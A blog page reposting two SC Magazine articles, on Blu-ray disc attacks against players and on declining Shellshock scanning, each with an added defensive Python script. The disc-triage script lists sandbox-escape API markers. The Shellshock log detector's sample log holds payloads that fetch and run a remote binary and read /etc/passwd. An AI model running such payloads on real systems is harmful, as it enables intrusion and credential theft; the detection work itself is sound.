Showing posts with label SC Magazine.

Tuesday, 3 March 2015

Hackers can use Blu-ray discs to breach networks.

An innocent-looking Blu-ray disc can be used by malicious actors to get a foothold in a targeted network, a researcher has warned.

According to Stephen Tomkinson of the NCC Group, both hardware and software Blu-ray players are plagued by vulnerabilities that can be leveraged to execute arbitrary files stored on the disc.

The advanced features provided by Blu-ray discs, such as dynamic menus and Web access, are built using BD-J (Blu-ray Disc Java). The specification is used to create interfaces and embedded applications called Xlets. Xlets are similar to Java applets, but they are specially designed for digital TV environments.

Xlets run in a Java VM, and the player enforces its security policy through the SecurityManager class. Tomkinson noted that, in general, this policy confines a disc to its own virtual file system and prevents interaction with the underlying operating system.

In his tests, Tomkinson targeted PowerDVD, a popular Blu-ray player application developed by CyberLink. The researcher found a way to disable the SecurityManager implemented by CyberLink and reach methods that can be used to launch arbitrary executable files stored on the disc.

On systems where PowerDVD is installed, an inserted Blu-ray disc is opened automatically in the application, so the attack does not depend on the AutoRun behaviour that Windows has since restricted, the expert said.

As for physical Blu-ray players, the researcher used an exploit previously developed by Malcolm Stagg to get a shell on the device. From there, Tomkinson managed to come up with a way to execute arbitrary files located on the disc.

Both software and physical players can be targeted with a single disc, the researcher said. An attacker can create a disc that detects the player type and executes a malicious file specific to that platform. In order to avoid raising suspicion, a legitimate video file can be played right after the malicious files are launched.
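As an added example (not NCC Group's or CyberLink's code, and not the exploit described in the article), the Python script below performs the kind of static triage a practitioner would run on a disc image from an untrusted source before playing it: it looks for BD-J applications (JARs under BDMV/JAR in the standard disc layout), checks their classes for references to process-launching or sandbox-tampering APIs, and flags native executables staged anywhere on the disc, such as the per-platform payloads the article describes. The API strings and magic bytes are heuristics chosen for this example, and the disc tree it scans is constructed in a temporary directory.

```python
"""Static triage of a Blu-ray disc tree for BD-J content and bundled executables.

Added example, not NCC Group's or CyberLink's code and not the exploit from the
article. Assumes the standard BDMV layout, in which BD-J applications ship as
JARs under BDMV/JAR. The API strings and magic bytes are heuristics chosen for
this example.
"""
import json
import tempfile
import zipfile
from pathlib import Path

# Constant-pool strings a menu Xlet has no business referencing: process
# launching and tampering with the sandbox the player's SecurityManager sets up.
SUSPICIOUS_API_REFS = (
    b"java/lang/Runtime",        # Runtime.getRuntime().exec(...)
    b"java/lang/ProcessBuilder",
    b"setSecurityManager",       # System.setSecurityManager(null)
)

# Magic bytes of native executables an attacker might stage on the disc,
# one per player platform the disc could detect.
EXEC_MAGIC = (
    (b"MZ", "PE (Windows software player)"),
    (b"\x7fELF", "ELF (Linux-based hardware player)"),
)


def scan_jar(jar_path):
    """Return the suspicious API references found in any class of the JAR."""
    found = set()
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if not name.endswith(".class"):
                continue
            data = jar.read(name)
            found.update(ref.decode() for ref in SUSPICIOUS_API_REFS if ref in data)
    return sorted(found)


def native_type(path):
    """Identify a file as a native executable by its magic bytes, else None."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    for magic, description in EXEC_MAGIC:
        if head.startswith(magic):
            return description
    return None


def triage_disc(root):
    """Walk a mounted disc (or extracted image) and report BD-J and native code."""
    root = Path(root)
    report = {"bdj_present": False, "jars": {}, "native_executables": {}}
    jar_dir = root / "BDMV" / "JAR"
    jars = sorted(jar_dir.glob("*.jar")) if jar_dir.is_dir() else []
    report["bdj_present"] = bool(jars)
    for jar in jars:
        report["jars"][jar.name] = scan_jar(jar)
    for path in root.rglob("*"):
        if path.is_file():
            kind = native_type(path)
            if kind:
                report["native_executables"][path.relative_to(root).as_posix()] = kind
    return report


def build_sample_disc(root):
    """Constructed sample, not a real disc: a menu Xlet whose class references
    Runtime and setSecurityManager, a video stream, and two payloads hidden
    beside it under innocuous names."""
    root = Path(root)
    (root / "BDMV" / "JAR").mkdir(parents=True)
    (root / "BDMV" / "STREAM").mkdir(parents=True)
    with zipfile.ZipFile(root / "BDMV" / "JAR" / "00000.jar", "w") as jar:
        # Only the constant-pool strings matter to this heuristic, so a class
        # header followed by the UTF8 entries stands in for a compiled class.
        jar.writestr("menu/MenuXlet.class",
                     b"\xca\xfe\xba\xbe" + b"java/lang/Runtime\x00exec\x00setSecurityManager")
    (root / "BDMV" / "STREAM" / "00000.m2ts").write_bytes(b"\x47" * 16)
    (root / "BDMV" / "STREAM" / "00001.m2ts").write_bytes(b"MZ\x90\x00" + b"\x00" * 12)
    (root / "BDMV" / "STREAM" / ".cache").write_bytes(b"\x7fELF\x01\x01\x01" + b"\x00" * 9)
    return root


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return triage_disc(build_sample_disc(tmp))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run against a real disc by calling `triage_disc("/media/bluray")` on the mount point. A BD-J JAR that references Runtime or the SecurityManager, or a file under STREAM that begins with a PE or ELF header instead of MPEG-TS sync bytes, is reason enough not to play the disc on a networked machine.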

“[The malicious] executables could be used by an attacker to provide a tunnel into the target network or to exfiltrate sensitive files, for example,” Tomkinson explained in a blog post.

The researcher pointed out that, in the case of physical Blu-ray players, an attacker needs to ensure that the device doesn't go to sleep after the victim has stopped viewing the video. This can be achieved by intercepting the power-off request and switching off the power LED so that the player appears to be off.

In an attack on a corporate network, if the player is configured for Wi-Fi access, attackers can read the Wi-Fi settings directly off the device, because they are stored there unencrypted.

The NCC Group says it's working with affected vendors to get the vulnerabilities fixed, but “with varying degrees of success.” Until the vulnerabilities are addressed, Tomkinson advises users not to use discs from untrusted sources and to disable the autoplay feature. Hardware players should not be connected to the network or the Internet unless necessary.

Using removable media to distribute malware is not unheard of. The Equation Group, an entity that is believed to have ties to the NSA, reportedly replaced CD-ROMs sent out by the organizers of a scientific conference with ones containing malware.

(Article Taken from SC Magazine)

Monday, 24 November 2014

The Worst Of Shellshock Might Have Already Passed...

Shellshock is continuing to make waves in the digital world, but if new research is any indication, scans for the bug seem to be slowing down and attacks might have already peaked.

Attacks on domains peaked in the days following the bug's disclosure on Sept. 24. One study by Akamai researchers found that targeted-domain attacks reached a high of 8,021 only three days later. The following day, Sept. 28, those domain attacks were cut nearly in half, dropping to 4,576.

Michael Smith, CSIRT director at Akamai, attributes the drop to users scanning their own systems immediately after learning about the bug. The tapering off could indicate more effective patching, or that a clear assessment of affected devices had already been performed. However, Smith wasn't completely sure this was the case.

“But it [the drop] also reminds me that correlation is not causation,” Smith said in an interview with SCMagazine.com. “Although it indicates that might be what's happening.”

The same pattern was seen in unique payload attacks per day. On Sept. 27, the number peaked at 20,753. A day later, it was down to 15,071.

For attackers, the Bash bug might initially have seemed to open up new ground to explore post-Heartbleed, but in reality, vulnerable systems are difficult to find in the wild.

“It's more difficult to exploit the bash bug, but if you're successful, it can be more severe,” said Ben Feinstein, director of operation and development for the Dell SecureWorks Counter Threat Unit, in an interview with SCMagazine.com.

If an exploitable device is found, attackers can execute commands, whereas with Heartbleed, a successful attack could turn over information such as passwords or encryption keys, wrote Dennis Dwyer, senior security researcher for the Counter Threat research team, in an email correspondence with SCMagazine.com. Attackers can use recycled scripts, for instance, but ultimately, finding those devices proves difficult. This could become an attack deterrent.
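As an added example (not Akamai's or Dell SecureWorks' tooling), the Python script below shows what the scanning described above looks like from the defender's side. It parses Apache combined-format access-log lines, flags request headers carrying the Shellshock function-definition prefix that a CGI server would export into bash's environment, extracts the command the attacker appended, and counts probes and distinct payloads per day, the two metrics the article quotes. The log lines are constructed for the example, using documentation-range IP addresses.

```python
"""Detect Shellshock (CVE-2014-6271) probes in web server access logs.

Added example, not Akamai's or Dell SecureWorks' code. Assumes Apache
'combined' log format with the User-Agent as the last quoted field; the
sample lines below are constructed, not captured traffic.
"""
import re
from collections import defaultdict

# Apache 'combined': ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Bash's function-import bug fires on an environment variable whose value
# starts with "() {"; CGI copies request headers into the environment, so the
# probe arrives as a header value. The pattern tolerates the spacing used by
# CVE-2014-6271 probes and also matches the "() { (a)=>\'" form of
# CVE-2014-7169, which has no "};" for extract_payload to split on.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")


def extract_payload(header_value):
    """Return the command appended after the function body, or None when the
    header is not a Shellshock probe."""
    m = SHELLSHOCK.search(header_value)
    if not m:
        return None
    rest = header_value[m.end():]
    idx = rest.find("};")          # commands follow the closing "};"
    return rest[idx + 2:].strip() if idx != -1 else rest.strip()


def parse_line(line):
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def find_probes(lines):
    """One hit per log line carrying a probe, with the first field it was found in."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        for field in ("ua", "referer", "req"):
            payload = extract_payload(rec[field])
            if payload is not None:
                hits.append({"ip": rec["ip"], "day": rec["ts"].split(":")[0],
                             "field": field, "payload": payload})
                break
    return hits


def summarize(hits):
    """Per-day counts of the kind quoted in the article: probes and distinct payloads."""
    per_day = defaultdict(lambda: {"probes": 0, "payloads": set()})
    for h in hits:
        per_day[h["day"]]["probes"] += 1
        per_day[h["day"]]["payloads"].add(h["payload"])
    return {d: {"probes": v["probes"], "unique_payloads": len(v["payloads"])}
            for d, v in per_day.items()}


# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    # 27 Sep: three probes with three different payloads (two in User-Agent, one in Referer)
    '203.0.113.5 - - [27/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://198.51.100.7/x -O /tmp/x; chmod +x /tmp/x; /tmp/x\\""',
    '203.0.113.9 - - [27/Sep/2014:10:03:27 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; echo Content-type: text/plain; echo; /usr/bin/id"',
    '198.51.100.23 - - [27/Sep/2014:10:05:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { :;}; /usr/bin/id" "curl/7.37.0"',
    # 28 Sep: a benign request and two probes carrying the same payload
    '192.0.2.44 - - [28/Sep/2014:08:11:02 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '198.51.100.23 - - [28/Sep/2014:08:12:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"cat /etc/passwd\\""',
    '203.0.113.77 - - [28/Sep/2014:08:14:58 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"cat /etc/passwd\\""',
]


def demo():
    return summarize(find_probes(SAMPLE_LOG))


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
    print(demo())
```

Feed it a real log with `find_probes(open("access.log"))`. The probe-versus-unique-payload split matters for the question the article raises: many probes carrying one recycled payload point to scanning, while rising payload diversity points to attackers tailoring commands to hosts they have already found.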
Still, compared to Heartbleed, the level of expertise required to exploit Bash is significantly less, which could make it attractive to attackers. Some experts expect the attacks might dwindle, though.

“Potentially, people have completed their scans and learned what they wanted to learn,” Dwyer said. “There will always be threat actors out there exploiting the Bash vulnerability, and it will slowly taper off over time.”

(Article taken from SC Magazine)